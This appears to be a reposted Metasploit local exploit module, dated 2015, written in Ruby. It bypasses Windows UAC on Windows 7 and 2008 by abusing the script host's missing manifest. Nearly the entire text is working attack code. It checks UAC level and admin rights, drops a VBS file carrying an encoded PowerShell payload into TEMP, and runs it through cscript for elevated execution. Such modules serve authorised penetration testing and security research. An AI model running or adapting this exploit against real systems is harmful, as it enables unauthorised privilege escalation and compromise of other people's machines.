Windows Escalate UAC Protection Bypass
Posted on 04 September 2015
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::FileDropper include Exploit::Powershell include Post::File include Post::Windows::Priv include Post::Windows::Runas def initialize(info={}) super( update_info( info, 'Name' => 'Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)', 'Description' => %q{ This module will bypass Windows UAC by utilizing the missing .manifest on the script host cscript/wscript.exe binaries. }, 'License' => MSF_LICENSE, 'Author' => [ 'Vozzie', 'Ben Campbell' ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ] ], 'DefaultTarget' => 0, 'References' => [ [ 'URL', 'http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html', 'URL', 'https://github.com/Vozzie/uacscript' ] ], 'DisclosureDate'=> 'Aug 22 2015' )) end def exploit # Validate that we can actually do things before we bother # doing any more work validate_environment! check_permissions! # get all required environment variables in one shot instead. This # is a better approach because we don't constantly make calls through # the session to get the variables. env_vars = get_envs('TEMP', 'WINDIR') case get_uac_level when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT fail_with(Failure::NotVulnerable, "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..." ) when UAC_DEFAULT print_good('UAC is set to Default') print_good('BypassUAC can bypass this setting, continuing...') when UAC_NO_PROMPT print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') shell_execute_exe return end vbs_filepath = "#{env_vars['TEMP']}\#{rand_text_alpha(8)}.vbs" upload_vbs(vbs_filepath) cmd_exec("cscript.exe //B #{vbs_filepath}") end def check_permissions! # Check if you are an admin vprint_status('Checking admin status...') admin_group = is_in_admin_group? if admin_group.nil? print_error('Either whoami is not there or failed to execute') print_error('Continuing under assumption you already checked...') else if admin_group print_good('Part of Administrators group! Continuing...') else fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') end end if get_integrity_level == INTEGRITY_LEVEL_SID[:low] fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level') end end def upload_vbs(payload_filepath) vbs = File.read(File.join(Msf::Config.data_directory, 'exploits', 'scripthost_uac_bypass', 'bypass.vbs')) command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true) vbs.gsub!('COMMAND', command) print_status('Uploading the Payload VBS to the filesystem...') begin vprint_status("Payload VBS #{vbs.length} bytes long being uploaded..") write_file(payload_filepath, vbs) register_file_for_cleanup(payload_filepath) rescue Rex::Post::Meterpreter::RequestError => e fail_with(Failure::Unknown, "Error uploading file #{payload_filepath}: #{e.class} #{e}") end end def validate_environment! fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? winver = sysinfo['OS'] case winver when /Windows (7|2008)/ print_good("#{winver} may be vulnerable.") else fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.") end if is_uac_enabled? print_status('UAC is Enabled, checking level...') else unless is_in_admin_group? fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') end end end end